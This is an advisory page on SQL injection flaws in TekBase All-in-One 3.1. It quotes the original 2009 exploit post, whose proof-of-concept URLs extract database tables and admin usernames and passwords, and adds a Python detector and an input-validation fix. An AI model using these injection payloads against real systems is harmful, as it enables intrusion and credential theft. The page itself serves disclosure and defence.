Vendor: TekBase All-in-One
By: n3wb0ss
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: TekBase All-in-One
Affected Version From: 3.1
Affected Version To: 3.1
Patch Exists: No
Related CWE: N/A
CPE: a:tekbase:tekbase_all-in-one
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

TekBase All-in-One 3.1 Multiple SQL Injection Vulnerabilities

TekBase All-in-One 3.1 is vulnerable to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information such as usernames and passwords. The first vulnerability requires an authenticated attacker with admin access. The second vulnerability can be exploited by any attacker holding an ordinary member account; no admin privileges are needed. Both vulnerabilities are caused by improper sanitization of user-supplied input: the 'ids' parameter of the 'admin.php' script (reached via op=adminSupport) and the 'y' parameter of the 'members.php' script (reached via op=membersBills), as the proof-of-concept URLs in the raw advisory show.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Exploit-DB raw data:

############################
# Author: n3wb0ss
# Date: 15/06/09
# Contact: n3wboss@Safe-mail.net
############################
# Software: TekBase All-in-One 3.1 
# Vendor: tekbase.de
# Example: http://demo.tekbase.de/
# Vendor contacted: No
# Risk: High
############################
# I found this website on a german board, looking for another script.
# Looks to me like a Gameserver, TS-Server, Whatever-Server managing script. No matter...
# It's vuln. I found a lot more, but I decided to release just two examples to the public.
# U need access data, you can get them for demo on tekbase.de (Admin&Customer-Login)
############################
# Here it is (adminaccess needed):
# Unfortunately I can't provide any sourcecode of this shit... it's closed source crap. But I think it should be easy to get it :P
# Have fun!
# POC: 
http://demo.tekbase.de/admin.php?op=adminSupport&zahl=0&torder=&tcounter=15&ids=99991%27/**/unIon/**/Select/**/1,2,3,4,CONCAT(unhex(hex(TABLE_NAME))),6,7,8,9,10,11/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/*

############################
# Second one (just be a member):
# POC:
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3,4,5,6,7,8/**/FroM/**/INFORMATION_SCHEMA.TABLES/*
http://demo.tekbase.de/members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,group_concAT(admin,0x3a,password),3,4,5,6,7,8/**/FroM/**/teklab_admin/*

############################
# As said before, just 2 of many vulns
# 
#
# H4ppy Gr33tinGs to the only On3
#
###########################

# milw0rm.com [2009-06-17]
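The injection pattern in the two PoC URLs above and the input-validation fix from the mitigation section, as an added Python example (not code from the advisory or from TekBase): it normalizes query-string values the way a detector must before matching, flags the UNION/INFORMATION_SCHEMA probe on constructed request lines, and shows strict integer validation rejecting the payload. It assumes 'y' and 'ids' are numeric fields; the request lines are constructed from the PoC shapes, not captured traffic.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines modelled on the shape of the advisory's PoC URLs
# (not real log data): one benign and one injected request per script.
SAMPLE_REQUESTS = [
    "GET /members.php?op=membersBills&y=2007 HTTP/1.1",
    "GET /members.php?op=membersBills&y=-2007%27/**/unION/**/SeleCT/**/1,TABLE_NAME,3/**/FroM/**/INFORMATION_SCHEMA.TABLES/* HTTP/1.1",
    "GET /admin.php?op=adminSupport&ids=15 HTTP/1.1",
    "GET /admin.php?op=adminSupport&ids=99991%27/**/unIon/**/Select/**/1,2/**/frOM/**/INFORMATION_SCHEMA.COLUMNS/**/liMIT/**/-1/* HTTP/1.1",
]

UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b")
SCHEMA_PROBE = re.compile(r"\binformation_schema\b")


def normalize(value: str) -> str:
    """Undo the evasions the PoCs rely on before matching: URL encoding,
    /**/ used in place of whitespace, and mixed-case keywords."""
    decoded = unquote(value)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)  # inline comments act as spaces
    return re.sub(r"\s+", " ", decoded).lower()


def flag_request(request_line: str) -> Dict[str, List[str]]:
    """Map each query parameter whose normalized value carries a UNION SELECT
    to the indicators seen; an empty dict means nothing suspicious."""
    path = request_line.split()[1]
    hits: Dict[str, List[str]] = {}
    for name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        norm = normalize(raw)
        if UNION_SELECT.search(norm):
            hits[name] = ["union_select"]
            if SCHEMA_PROBE.search(norm):
                hits[name].append("information_schema")
    return hits


def validate_int_param(raw: str, lo: int, hi: int) -> Optional[int]:
    """Allow-list validation for the fix: assuming 'y' (a year) and 'ids' (a record
    id) are numeric, accept only a plain integer inside [lo, hi]; anything else,
    including the quote that opens the injection, is rejected, not filtered."""
    if not re.fullmatch(r"-?\d{1,10}", raw):
        return None
    value = int(raw)
    return value if lo <= value <= hi else None


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(flag_request(line) or "clean", "<-", line.split()[1][:60])
```

Rejecting non-integer values outright removes the injection point; pairing that with parameterized queries on the server side is what closes the bug, since blocklist filters for "UNION" are defeated by exactly the case and comment tricks the PoCs use.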